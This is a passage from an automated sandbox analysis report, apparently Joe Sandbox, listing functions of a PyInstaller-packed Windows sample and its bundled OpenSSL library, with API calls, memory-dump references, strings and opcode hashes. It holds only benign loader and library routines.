                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7B2B63706,?,00007FF7B2B63804), ref: 00007FF7B2B62C9E
                                                                                                                                                                                                                                    • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7B2B63706,?,00007FF7B2B63804), ref: 00007FF7B2B62D63
                                                                                                                                                                                                                                    • MessageBoxW.USER32 ref: 00007FF7B2B62D99
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Message$CurrentFormatProcess
                                                                                                                                                                                                                                    • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                                                                                                                                                                    • API String ID: 3940978338-251083826
                                                                                                                                                                                                                                    • Opcode ID: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                                                                                                                                                    • Instruction ID: dbe2e5dddbff3a4d54fc918a9b037df6f06ce0f6b101bdbb2b1c8e9d67e548f6
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1A31F822709A4142F622BB29A8142ABF691BF99788F800136EF4DD775DFF7CD506C710
                                                                                                                                                                                                                                    Function 00007FFD93D160D2 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 227COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2450811470.00007FFD93D11000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFD93D10000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450428384.00007FFD93D10000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D1D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D75000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D89000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D9A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93DA0000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93DAD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F5D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F5F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F8A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93FBB000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93FE1000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD9402F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94035000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94037000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94053000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94060000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2453865099.00007FFD94064000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2453916688.00007FFD94066000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd93d10000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Fiber$Switch$CreateDelete
                                                                                                                                                                                                                                    • String ID: *$..\s\crypto\async\async.c
                                                                                                                                                                                                                                    • API String ID: 2050058302-1471988776
                                                                                                                                                                                                                                    • Opcode ID: 1831d7c809a8188426ac0f01b2ae61a537539a6563a9100cc60af150d2942dba
                                                                                                                                                                                                                                    • Instruction ID: c5a5ba66f60370f8762f9a07f4207a216c4279b15d0701401d5bf59cb80617a5
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1831d7c809a8188426ac0f01b2ae61a537539a6563a9100cc60af150d2942dba
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3BA15572B09A4292EB34DFE6E4B026973A8EF44B84F049131CA8D57BA5EF3DE555C700
                                                                                                                                                                                                                                    Function 00007FFD93D12E46 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 91COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2450811470.00007FFD93D11000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFD93D10000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450428384.00007FFD93D10000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D1D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D75000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D89000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D9A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93DA0000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93DAD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F5D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F5F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F8A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93FBB000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93FE1000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD9402F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94035000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94037000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94053000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94060000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2453865099.00007FFD94064000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2453916688.00007FFD94066000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd93d10000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: EnvironmentVariable
                                                                                                                                                                                                                                    • String ID: OPENSSL_ia32cap$~$~$~$~
                                                                                                                                                                                                                                    • API String ID: 1431749950-1981414212
                                                                                                                                                                                                                                    • Opcode ID: f54770ac84b8c5300f15358e4cffcff24408fff1c96f1f72ed2546603f76ac2f
                                                                                                                                                                                                                                    • Instruction ID: d5ecfc081238a94a153d1f415efb610fbeb6a25bd8735b8bfab0527daf232a54
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f54770ac84b8c5300f15358e4cffcff24408fff1c96f1f72ed2546603f76ac2f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EA418124F0C6578AEB34DBC5A4B01B936A4EB45780F848235E95E677A9EF3DE481E700
                                                                                                                                                                                                                                    Function 00007FF7B2B6DCC8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,?,?,00007FF7B2B6DF7A,?,?,?,00007FF7B2B6DC6C,?,?,?,00007FF7B2B6D869), ref: 00007FF7B2B6DD4D
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00007FF7B2B6DF7A,?,?,?,00007FF7B2B6DC6C,?,?,?,00007FF7B2B6D869), ref: 00007FF7B2B6DD5B
                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,?,?,00007FF7B2B6DF7A,?,?,?,00007FF7B2B6DC6C,?,?,?,00007FF7B2B6D869), ref: 00007FF7B2B6DD85
                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,?,?,00007FF7B2B6DF7A,?,?,?,00007FF7B2B6DC6C,?,?,?,00007FF7B2B6D869), ref: 00007FF7B2B6DDF3
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,?,?,00007FF7B2B6DF7A,?,?,?,00007FF7B2B6DC6C,?,?,?,00007FF7B2B6D869), ref: 00007FF7B2B6DDFF
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                    • String ID: api-ms-
                                                                                                                                                                                                                                    • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                    • Opcode ID: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                                    • Instruction ID: 54afd11ce53b674d5d73d884eed212910d6a18f819cd1efb76245513016dc380
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6331D321B1B60281EE13BB1A9400676E394FF27BA4F990535DF1D8A398FEBCE040D324
                                                                                                                                                                                                                                    Function 00007FFD93D13779 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 85COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2450811470.00007FFD93D11000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFD93D10000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450428384.00007FFD93D10000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D1D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D75000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D89000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D9A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93DA0000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93DAD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F5D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F5F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F8A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93FBB000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93FE1000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD9402F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94035000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94037000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94053000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94060000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2453865099.00007FFD94064000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2453916688.00007FFD94066000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd93d10000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: 00007B2245630
                                                                                                                                                                                                                                    • String ID: MASK:$default$nombstr$pkix$utf8only
                                                                                                                                                                                                                                    • API String ID: 1780217008-3483942737
                                                                                                                                                                                                                                    • Opcode ID: a21ae9ee1a6a80a1cd62bd08bae20b9b71c674710c0f9c2fb243c96c79f53681
                                                                                                                                                                                                                                    • Instruction ID: 495fc6f192fef1c3d81da09ee30b2328d5876a3815f7443ecaf9538c1b74b8df
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a21ae9ee1a6a80a1cd62bd08bae20b9b71c674710c0f9c2fb243c96c79f53681
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3C310962B1C5C582EB714BE9E4B07B837A5EB46B60F446232EB5E43692DF3CE494C700
                                                                                                                                                                                                                                    Function 00007FF7B2B62A50 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 64COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF7B2B6351A,?,00000000,00007FF7B2B63F23), ref: 00007FF7B2B62AA0
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CurrentProcess
                                                                                                                                                                                                                                    • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                    • API String ID: 2050909247-2900015858
                                                                                                                                                                                                                                    • Opcode ID: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                                                                                                                                                                    • Instruction ID: af8f5270a3ab3a0a3036792c9bee97f3e703a4e496ffdebd4539f8ee686ade3c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5221B13261A78182E622AB29B8417E7F294FB99384F800136EF8C9375DEFBCD145C750
                                                                                                                                                                                                                                    Function 00007FF7B2B68570 Relevance: 10.6, APIs: 7, Instructions: 63COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 995526605-0
                                                                                                                                                                                                                                    • Opcode ID: 70f390a37a83c39b0b93a8e81c7ccc07b23603dbaa07a0076cfadab7197a24fb
                                                                                                                                                                                                                                    • Instruction ID: c4c61c8401e5331d7924af190426d5a6140179d29da209a2eb848dfd01648c6b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 70f390a37a83c39b0b93a8e81c7ccc07b23603dbaa07a0076cfadab7197a24fb
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 95217821A0D64242DA12AB5DB44413BE3A0FF927A0F900635D76D876EDEEBCD449C710
                                                                                                                                                                                                                                    Function 00007FF7B2B7B150 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Value$ErrorLast
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2506987500-0
                                                                                                                                                                                                                                    • Opcode ID: bd40692f84e3da01acd5c9e715af8932c2ff4b5b564443a413d720313231dc09
                                                                                                                                                                                                                                    • Instruction ID: b7df2a62a2aaea6be40c9e0cf40f393490a7c80dc4d355fcf58d23aee2dace7c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bd40692f84e3da01acd5c9e715af8932c2ff4b5b564443a413d720313231dc09
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9021AF20A0F24281F65B776D555113BD2425F767B0F904634DB3E46BEEFDACA481CB20
                                                                                                                                                                                                                                    Function 00007FF7B2B87D6C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                    • String ID: CONOUT$
                                                                                                                                                                                                                                    • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                    • Opcode ID: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                                                                                                                                                    • Instruction ID: 614847d7d1537a0ea4eb4ee3cb15e8dcac57bbd8e028964497da16c8bb366705
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8B11DA21719A4182E751AB1AE84833AF6A0FB99FE4F540234DB5D8B7ACEFBCD440C710
                                                                                                                                                                                                                                    Function 00007FF7B2B68ED0 Relevance: 9.1, APIs: 6, Instructions: 121COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,FFFFFFFF,00000000,00007FF7B2B63FB1), ref: 00007FF7B2B68EFD
                                                                                                                                                                                                                                    • K32EnumProcessModules.KERNEL32(?,FFFFFFFF,00000000,00007FF7B2B63FB1), ref: 00007FF7B2B68F5A
                                                                                                                                                                                                                                      • Part of subcall function 00007FF7B2B69390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7B2B645F4,00000000,00007FF7B2B61985), ref: 00007FF7B2B693C9
                                                                                                                                                                                                                                    • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF7B2B63FB1), ref: 00007FF7B2B68FE5
                                                                                                                                                                                                                                    • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF7B2B63FB1), ref: 00007FF7B2B69044
                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF7B2B63FB1), ref: 00007FF7B2B69055
                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF7B2B63FB1), ref: 00007FF7B2B6906A
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3462794448-0
                                                                                                                                                                                                                                    • Opcode ID: 5fdc8b78e5c178b08539d0cecd8d3e2e1f70e2bff578ca0288336d2a317a6702
                                                                                                                                                                                                                                    • Instruction ID: a98cf290ef694c4207205ea9c9f60dbf5f0e35ac7a1d52a7dd059e6231f6c00c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5fdc8b78e5c178b08539d0cecd8d3e2e1f70e2bff578ca0288336d2a317a6702
